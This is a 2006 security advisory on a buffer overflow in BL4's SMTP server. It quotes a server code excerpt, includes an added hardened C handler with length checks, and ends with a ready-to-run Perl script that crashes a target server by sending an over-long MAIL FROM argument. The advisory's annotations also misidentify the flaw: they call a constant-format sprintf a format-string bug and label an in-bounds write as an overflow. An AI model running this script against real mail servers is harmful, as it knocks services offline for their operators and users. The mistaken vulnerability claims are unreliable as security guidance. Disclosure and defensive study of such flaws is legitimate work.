---------------------------------------------------------------------------
[ECHO_ADV_30$2006] BL4's SMTP server Buffer Overflow Vulnerability
---------------------------------------------------------------------------

Author       : Dedi Dwianto
Date         : April, 27th 2006
Location     : Indonesia, Jakarta
Web          : http://advisories.echo.or.id/adv/adv30-theday-2006.txt
Critical Lvl : High

---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : BL4's SMTP server
Version     : < 0.1.5
URL         : http://bl4qkubartnndfhr.emmeya.com/prog/smtp?0
Description :
BL4's SMTP server is an inbound-only SMTP server. It currently uses
hardcoded values for handling email. The SMTP server puts the incoming
email into various text files.

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~~~~

BL4's SMTP server is vulnerable to a flaw that allows a remote attacker to
cause a denial of service or execute arbitrary code. The vulnerability is
due to a buffer overflow in the SMTP service. A remote attacker can
repeatedly send more than 2100 bytes as the argument to the HELO, MAIL FROM
and RCPT TO commands to crash the server.

------------------think.c-----------------------------------
...........
        {
            slaveEmail[x]->isData    = 0;
            slaveEmail[x]->emailFrom = 0;
            slaveEmail[x]->emailTo   = 0;
            free(buffer);
            buffer = malloc(sizeof(char) * 12);
            sprintf(buffer, "250 OK\r\n");
            return buffer;
        }
        free(buffer);
.............
        slaveEmail[x]->EHLO     = buffer;
        slaveEmail[x]->EHLOtrue = 1;
        buffer = malloc(sizeof(char) * 12);
        sprintf(buffer, "250 OK\r\n");
        return buffer;
-----------------------------------------------------------

--  sprintf(buffer, "250 OK\r\n");
--  Vulnerable to format strings.

--  free(buffer);
--  buffer = malloc(sizeof(char) * 12);
--  Vulnerable to buffer overflow. An attacker can execute arbitrary code here.
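The excerpt above shows only the reply path of the handler; the advisory locates the fault in how the HELO, MAIL FROM and RCPT TO arguments are handled. The following is an added example written for this advisory, not code from BL4's source: a command handler that checks the length of a line and of each argument before copying into fixed-size buffers, refuses over-long input with an SMTP error instead of writing past the buffer, and builds its reply with snprintf rather than sprintf into a hand-sized malloc. The limits (512-octet command line, 256-octet path, taken from RFC 5321 section 4.5.3.1), the session struct and every function name here are this example's own assumptions.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Limits from RFC 5321 section 4.5.3.1: a command line is at most 512 octets
 * including CRLF, a reverse-path or forward-path at most 256 octets. Using
 * them as hard caps is this example's choice, not BL4's. */
#define MAX_CMD_LINE 512
#define MAX_PATH     256

/* Assumed per-connection state; fixed-size fields, so every write is bounded. */
typedef struct {
    char helo[MAX_PATH + 1];
    char mail_from[MAX_PATH + 1];
    char rcpt_to[MAX_PATH + 1];
    int  have_from;
} smtp_session;

/* Case-insensitive prefix test (SMTP verbs are case-insensitive). Stops at
 * the first mismatch, so a short line is never read past its terminator. */
static int has_prefix_ci(const char *line, const char *prefix) {
    for (; *prefix; line++, prefix++)
        if (tolower((unsigned char)*line) != tolower((unsigned char)*prefix))
            return 0;
    return 1;
}

/* Copy a command argument (everything up to CRLF) into a fixed buffer.
 * The length is checked BEFORE the copy, so an over-long argument is
 * rejected and dst is left untouched. Returns 0 on success, -1 if too long. */
static int copy_arg(char *dst, size_t dstlen, const char *arg) {
    while (*arg == ' ') arg++;            /* tolerate "MAIL FROM: <x>" */
    size_t n = strcspn(arg, "\r\n");
    if (n >= dstlen) return -1;           /* would not fit with its NUL */
    memcpy(dst, arg, n);
    dst[n] = '\0';
    return 0;
}

/* Handle one raw command line (already read with a bounded read) and write
 * the reply with snprintf into the caller's buffer. Returns the reply code. */
int smtp_handle_line(smtp_session *s, const char *line, char *reply, size_t replylen) {
    int code;
    const char *text;

    if (strlen(line) > MAX_CMD_LINE) {    /* gate 1: whole line too long */
        code = 500; text = "Line too long";
    } else if (has_prefix_ci(line, "HELO ") || has_prefix_ci(line, "EHLO ")) {
        if (copy_arg(s->helo, sizeof s->helo, line + 5) != 0) { code = 501; text = "Argument too long"; }
        else { code = 250; text = "OK"; }
    } else if (has_prefix_ci(line, "MAIL FROM:")) {
        if (copy_arg(s->mail_from, sizeof s->mail_from, line + 10) != 0) { code = 501; text = "Argument too long"; }
        else { s->have_from = 1; code = 250; text = "OK"; }
    } else if (has_prefix_ci(line, "RCPT TO:")) {
        if (!s->have_from) { code = 503; text = "Need MAIL first"; }
        else if (copy_arg(s->rcpt_to, sizeof s->rcpt_to, line + 8) != 0) { code = 501; text = "Argument too long"; }
        else { code = 250; text = "OK"; }
    } else if (has_prefix_ci(line, "QUIT")) {
        code = 221; text = "Bye";
    } else {
        code = 500; text = "Command unrecognized";
    }
    /* Bounded formatting: the reply can never exceed replylen - 1 bytes. */
    snprintf(reply, replylen, "%d %s\r\n", code, text);
    return code;
}

int main(void) {
    smtp_session s = {0};
    char reply[64];
    /* Constructed sample lines: a normal greeting and an over-long argument. */
    smtp_handle_line(&s, "EHLO mail.example.test\r\n", reply, sizeof reply);
    printf("%s", reply);
    char big[MAX_CMD_LINE + 64];
    memset(big, 'A', sizeof big - 1);
    big[sizeof big - 1] = '\0';
    smtp_handle_line(&s, big, reply, sizeof reply);
    printf("%s", reply);
    return 0;
}
```

The two gates are deliberate: the line-length check stops the whole-line flood the advisory describes, while the per-argument check in copy_arg protects each fixed field even when the line as a whole is within limits. Because the check happens before memcpy, a rejected argument leaves the previous session value intact.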
PoC:
~~~~~~~~~~~~

#!/usr/bin/perl
use strict;
use warnings;
use IO::Socket;

# target host is required, port is optional (defaults to 25)
usage() if (@ARGV < 1 || @ARGV > 2);

my $adr = $ARGV[0];
my $prt = defined $ARGV[1] ? $ARGV[1] : "25";

my $socket = IO::Socket::INET->new(
    Proto    => "tcp",
    PeerAddr => $adr,
    PeerPort => $prt,
    Reuse    => 1
) or die "Error: can't connect to $adr:$prt\n";

print " -- Connecting To SMTP server at $adr port $prt ... \n";
sleep(1);

print $socket "EHLO yahoo.com\r\n"
    or die "Error : can't send Request\n";
print " -- Sending Request to $adr .....\n";
sleep(1);

# over-long MAIL FROM argument, well past the 2100 bytes described above
print $socket "MAIL FROM:" . "jessy" x 4600 . "\r\n"
    or die "Error : can't send Buffer\n";
print " -- Sending Buffer to $adr .....\n";
sleep(1);

printf("[+]Ok!\n");
printf("[+]Crash service.....\n");
printf("[~]Done.\n");
close($socket);

sub usage {
    print "\n=========================================\r\n";
    print " BL4's SMTP server Remote DOS \r\n";
    print "=========================================\r\n";
    print " Bug Found by Dedi Dwianto \r\n";
    print " www.echo.or.id #e-c-h-o irc.dal.net \r\n";
    print " Echo Security Research Group \r\n";
    print "=========================================\r\n";
    print " Usage: perl bl4-explo.pl [target] [port] \r\n\n";
    exit();
}

---------------------------------------------------------------------------

Shoutz:
~~~~~~~

~ y3dips,moby,comex,z3r0byt3,K-158,c-a-s-e,S`to,lirva32,anonymous
~ newbie_hacker@yahoogroups.com
~ #aikmel #e-c-h-o @irc.dal.net

---------------------------------------------------------------------------

Contact:
~~~~~~~~

Dedi Dwianto || echo|staff || the_day[at]echo[dot]or[dot]id
Homepage: http://theday.echo.or.id/

-------------------------------- [ EOF ] ----------------------------------